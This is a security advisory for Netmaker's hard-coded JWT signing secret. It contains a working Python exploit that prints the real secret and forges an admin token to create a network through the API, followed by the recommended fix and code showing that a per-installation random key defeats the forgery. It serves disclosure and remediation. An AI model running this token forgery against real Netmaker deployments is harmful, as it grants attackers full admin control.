Netmaker is an application that enables easy deployment of a mesh VPN based on WireGuard.
JWT tokens are used to authenticate and manage users throughout the application.
The secret key used to sign these tokens is hard-coded in the source, which means tokens can be forged. An attacker can therefore create a valid authentication token for any user and use it with admin privileges, since the privilege check is implemented on top of the token's claims.
To exploit this vulnerability it is necessary to know an existing username.
Instructions:
Change the username and netmaker_api variables to an existing username and the API URL of your instance.
Run the exploit below.
```python
from requests import post
import jwt  # pip3 install pyjwt

username = 'cenas1'  # CHANGEME valid username
netmaker_api = "https://api.nm.1-7-8-9.nip.io:443"  # CHANGEME please change this for your api host
netmaker_url = netmaker_api + "/api/networks"
hardcoded_secretKey = '(BytesOverTheWire)'  # signing secret shipped in the Netmaker source

# Forge a token carrying admin claims; the server accepts it because it validates
# signatures with the same hard-coded key
encoded_jwt = jwt.encode({
    "IsAdmin": True,
    "UserName": username,
    "Networks": [],
}, hardcoded_secretKey, algorithm='HS256')  # creates a "fake" JWT token
if isinstance(encoded_jwt, bytes):  # pyjwt 1.x returns bytes, 2.x returns str
    encoded_jwt = encoded_jwt.decode()
headers = {"Authorization": "Bearer " + encoded_jwt}

# Create a network (an admin-only operation) using the forged token
d_json = {"addressrange": "10.134.2.0/24", "addressrange6": "", "defaultudpholepunch": "yes", "isdualstack": "no", "islocal": "no", "localrange": "", "netid": "illegalnet"}
r = post(netmaker_url, headers=headers, json=d_json)
print(r.status_code, r.text)
```
Go to the Networks tab in the netmaker-ui and check whether a new network called illegalnet was created.
Impact:
An attacker knowing the username of a valid user can perform any action as a user with admin privileges.
Recommended fix:
Generate a random JWT signing key during the installation process.
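To illustrate the fix (added example, not code from the report or from Netmaker; the helper names are mine), the stdlib-only Python below implements HS256 signing and verification and shows that a token forged with the published secret is accepted when the server validates with that same secret, but rejected once each installation generates its own random key:

```python
import base64
import hashlib
import hmac
import json
import secrets

HARDCODED_SECRET = "(BytesOverTheWire)"  # the shared signing secret quoted in the report


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(claims: dict, key: str) -> str:
    """Build a compact JWT and sign it with HMAC-SHA256 (what jwt.encode does)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def hs256_verify(token: str, key: str):
    """Return the claims if the signature is valid under key, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
            return None  # pin the algorithm; never trust "none" or an attacker-chosen alg
        expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        return json.loads(b64url_decode(payload_b64))
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return None


def forged_admin_token(username: str) -> str:
    """The token the report's exploit constructs: admin claims under the public secret."""
    return hs256_sign({"IsAdmin": True, "UserName": username, "Networks": []}, HARDCODED_SECRET)


def generate_install_secret() -> str:
    """Per-installation secret (256 bits from the OS CSPRNG), as the fix recommends."""
    return secrets.token_urlsafe(32)


def is_admin_under(key: str, token: str) -> bool:
    """What the server's privilege check sees when it validates with the given key."""
    claims = hs256_verify(token, key)
    return bool(claims and claims.get("IsAdmin"))
```

Calling is_admin_under(HARDCODED_SECRET, forged_admin_token("cenas1")) returns True, while the same token checked under generate_install_secret() returns False.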